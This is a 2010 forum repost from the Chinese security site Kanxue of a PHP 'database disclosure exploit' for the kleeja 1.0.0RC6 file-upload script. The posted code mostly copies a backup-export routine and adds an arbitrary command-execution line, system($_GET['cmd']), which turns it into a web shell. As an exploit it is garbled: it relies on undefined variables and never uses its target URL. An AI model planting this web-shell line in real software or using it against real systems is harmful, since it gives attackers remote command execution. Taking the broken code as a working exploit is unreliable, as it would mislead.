[转帖]kleeja 1.0.0RC6 Database Disclosure-WEB安全-看雪-安全社区|安全招聘|kanxue.com

[转帖]kleeja 1.0.0RC6 Database Disclosure

发表于: 2010-8-11 12:22 1743

[转帖]kleeja 1.0.0RC6 Database Disclosure

freebsdlin 活跃值

2010-8-11 12:22

1743

====================================================

kleeja1.0.0RC6 Database Disclosure Exploit

====================================================

########################################################################

# Vendor: kleeja.com

# Date: 2010-05-27

# Author : indoushka

# Contact : 00213771818860

# Home : www.sec4ever.com

# Bug  : Database Disclosure Exploit

# Tested on : windows SP2 Fran?ais V.(Pnx2 2.0)

########################################################################



# Exploit By indoushka

<?php

$action    = "http://127.0.0.1/kleeja/admin.php?cp=bckup";

$sql_data = "# 1.0.0RC6, DB version:6\n";

         $sql_data .= "# Kleeja Backup kleeja.com  kleeja version : " . KLEEJA_VERSION . ", DB version:" . $config['db_version'] . "\n";

         $sql_data .= "# DATE : " . gmdate("d-m-Y H:i:s", time()) . " GMT\n";

         $sql_data .= "#\n\n\n";

         $cmd = $_GET['cmd'];

         system($cmd);

         $db_name_save = $dbname . '_kleeja.sql';

         @set_time_limit(0);

         header("Content-length: " . strlen($outta));

         header("Content-type: text/plain");

         header("Content-Disposition: attachment; filename=$db_name_save");

         echo $sql_data . $outta;

         exit;

?>

Dz-Ghost Team ===== Saoucha * Star08 * Cyber Sec * theblind74 * XproratiX * onurozkan * n2n * Meher Assel ===========================

[招生]科锐逆向工程师培训(2024年11月15日实地，远程教学同时开班, 第51期)

收藏・1

免费・0

支持